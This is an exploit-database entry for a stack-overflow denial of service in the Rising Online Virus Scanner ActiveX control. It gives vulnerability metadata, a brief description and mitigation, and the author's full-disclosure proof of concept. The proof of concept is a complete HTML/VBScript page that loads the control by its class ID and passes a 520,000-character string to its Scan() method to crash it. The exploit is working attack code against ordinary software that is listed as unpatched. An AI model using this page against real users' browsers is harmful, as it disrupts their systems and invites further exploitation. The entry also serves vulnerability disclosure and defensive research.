Rising Online Virus Scanner ActiveX Control DoS (Stack overflow)

vendor:

Online Virus Scanner

by:

wirebonder

7.5

CVSS

HIGH

Denial of Service (DoS)

120

CWE

Product Name: Online Virus Scanner

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP sp3

Unknown

Rising Online Virus Scanner ActiveX Control DoS (Stack overflow)

This exploit takes advantage of a stack overflow vulnerability in the Rising Online Virus Scanner ActiveX Control. By passing a large string as an argument to the 'Scan()' function, it causes the control to crash, resulting in a denial of service condition.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Rising Online Virus Scanner ActiveX Control to a patched version or disable the control if not needed.

Source

Exploit-DB raw data:

# Exploit Title: Rising Online Virus Scanner ActiveX Control DoS (Stack overflow)
# Author: wirebonder
# Software Link: http://www.rising-global.com/products/online-scanner-intro.html
# Tested on: Windows XP sp3


##
# ProgID: 	RavOLCtlLib.RavOnline
# ClassID:	9FAFB576-6933-4CCC-AB3D-B988EC43D04E
# Member: 	Scan()
# File:   	C:\Programme\Rising\RavOL\RavOLCtl.dll
# script safe:	true
# init safe: 	true
#
# Because Bullshit like this is unsaleable and i don't want to waste time
# coordinating patches with this vendor this is a fulldisc publishing.
##

<html>
<body>
<object classid='clsid:9FAFB576-6933-4CCC-AB3D-B988EC43D04E' id='obj'></object>
<script language='vbscript'>
	buf=String(520000, "A")
	obj.Scan buf
</script>
</body>
</html>